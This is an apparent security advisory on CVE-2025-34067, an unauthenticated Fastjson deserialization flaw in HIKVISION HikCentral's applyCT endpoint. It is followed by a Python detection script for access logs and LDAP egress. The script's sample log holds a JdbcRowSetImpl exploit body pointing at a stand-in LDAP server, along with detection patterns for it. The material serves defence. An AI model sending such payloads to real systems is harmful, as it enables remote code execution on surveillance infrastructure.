
A critical security flaw has been identified in HIKVISION's applyCT component, part of the HikCentral Integrated Security Management Platform, that allows unauthenticated attackers to execute arbitrary code remotely.

Designated CVE-2025-34067 with the maximum CVSS score of 10.0, the vulnerability stems from the platform's reliance on a vulnerable version of the Fastjson library and exposes millions of surveillance devices worldwide to potential exploitation.

Key Takeaways
1. CVE-2025-34067 (CVSS 10.0) in HIKVISION applyCT permits unauthenticated remote code execution.
2. Exploits the Fastjson library by sending malicious JSON to the /bic/ssoService/v1/applyCT endpoint, which triggers outbound LDAP connections.
3. Impacts HikCentral surveillance systems across government, commercial, and industrial sectors worldwide.
4. Evaluate deployments immediately, restrict network access, and contact HIKVISION for patches; the flaw is actively exploited.

Critical Fastjson Deserialization Defect

The vulnerability is exploited through the /bic/ssoService/v1/applyCT endpoint using malicious JSON payloads that are parsed by the Fastjson library.

Attackers can craft JSON requests that trigger Fastjson's auto-type feature, which allows arbitrary Java classes to be loaded.

The attack chain abuses the JdbcRowSetImpl class to open connections to an untrusted LDAP server, effectively bypassing the platform's security controls.

Exploitation requires sending a POST request with Content-Type: application/json to the vulnerable endpoint. By pointing the datasource parameter at a malicious LDAP server, attackers gain remote code execution on the underlying system.

This is a classic instance of CWE-502 (Deserialization of Untrusted Data) combined with CWE-917 (Expression Language Injection), where inadequate input validation permits unauthorized class loading and code execution.

The vulnerability affects the HikCentral platform, formerly known as the "Integrated Security Management Platform," a comprehensive security management solution widely deployed across government, commercial, and industrial sectors.

The platform's broad adoption amplifies the severity of the vulnerability, since it provides centralized control over multiple security devices and surveillance systems.

Potential consequences include unauthorized access to sensitive surveillance data, tampering with security systems, and the possibility of lateral movement within the network infrastructure.

Organizations running affected HIKVISION applyCT systems face the risk of data breaches, service disruption, and compromise of their overall security architecture.

Because the vulnerability requires no authentication, attackers can exploit it without valid credentials, considerably lowering the bar for malicious actors.

It has accordingly been listed as a known exploited vulnerability, indicating active exploitation in the wild.

Risk Factors / Details
Affected Products: HIKVISION HikCentral (formerly "Integrated Security Management Platform"); applyCT component; versions using the vulnerable Fastjson library
Impact: Remote Code Execution (RCE)
Exploit Prerequisites: network access to the /bic/ssoService/v1/applyCT endpoint; ability to send HTTP POST requests; no authentication required; access to a malicious LDAP server
CVSS Score: 10.0 (Critical)

Mitigations

Organizations should promptly inventory their HIKVISION applyCT deployments and implement network segmentation to minimize exposure.

Monitoring for anomalous network activity directed at the /bic/ssoService/v1/applyCT endpoint can help detect exploitation attempts.

While specific patches have not been outlined in current advisories, users should contact HIKVISION support for remediation guidance and consider temporarily restricting access to the vulnerable endpoint until patches are available.

Security teams should also scrutinize outbound LDAP connection attempts from their HIKVISION systems and consider deploying network-based intrusion detection systems to recognize exploitation attempts targeting this vulnerability.
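The two monitoring controls above (watching POSTs to the applyCT endpoint for the auto-type/JdbcRowSetImpl/LDAP-datasource pattern the advisory describes, and watching LDAP egress from HikCentral hosts) as an added detection example; this is not code from the advisory or from HIKVISION, and the log format, host addresses, allowed directory server and sample records are constructed assumptions.

```python
import json
import re

TARGET_PATH = "/bic/ssoService/v1/applyCT"
# Request indicators from the advisory: Fastjson auto-type marker, JdbcRowSetImpl
# gadget class, and a datasource pointing at a remote LDAP/RMI server.
INDICATORS = {
    "fastjson_autotype": re.compile(r'"@type"\s*:'),
    "jdbcrowset_gadget": re.compile(r"JdbcRowSetImpl", re.I),
    "remote_datasource": re.compile(r'"datasource(?:name)?"\s*:\s*"(?:ldap|rmi)://', re.I),
}
# Constructed sample access log (JSON lines as a reverse proxy in front of
# HikCentral might write them; field names are assumptions, not HIKVISION's).
SAMPLE_ACCESS_LOG = r"""
{"src":"198.51.100.7","method":"POST","path":"/bic/ssoService/v1/applyCT","body":"{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://203.0.113.9:1389/x\"}"}
{"src":"10.0.5.21","method":"POST","path":"/bic/ssoService/v1/applyCT","body":"{\"user\":\"ops\"}"}
{"src":"10.0.5.22","method":"GET","path":"/bic/ssoService/v1/status","body":""}
"""

def score_request(rec):
    """Return the indicator names matched by one access-log record."""
    if rec.get("method") != "POST" or rec.get("path") != TARGET_PATH:
        return []
    body = rec.get("body") or ""
    return [name for name, rx in INDICATORS.items() if rx.search(body)]

def scan_access_log(text):
    """Return (source IP, matched indicators) for suspicious posts to applyCT."""
    hits = []
    for line in text.strip().splitlines():
        rec = json.loads(line)
        matched = score_request(rec)
        if matched:
            hits.append((rec["src"], matched))
    return hits

# LDAP egress control (host address, allowed directory server and flows are constructed).
HIKCENTRAL_HOSTS = {"10.0.5.10"}
ALLOWED_LDAP_SERVERS = {"10.0.1.5"}
LDAP_PORTS = {389, 636, 1389}
SAMPLE_FLOWS = [
    ("10.0.5.10", "10.0.1.5", 636),      # corporate directory: expected
    ("10.0.5.10", "203.0.113.9", 1389),  # unknown LDAP server: suspicious
    ("10.0.5.10", "10.0.1.20", 443),     # unrelated internal HTTPS
]

def suspicious_ldap_egress(flows):
    """Flows where a HikCentral host talks LDAP to a non-allowlisted server."""
    return [(s, d, p) for s, d, p in flows
            if s in HIKCENTRAL_HOSTS and p in LDAP_PORTS and d not in ALLOWED_LDAP_SERVERS]
```

A single matched indicator on a benign applyCT request is possible, so treat the full three-indicator match plus an unexpected LDAP flow from the same host as the high-confidence signal.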
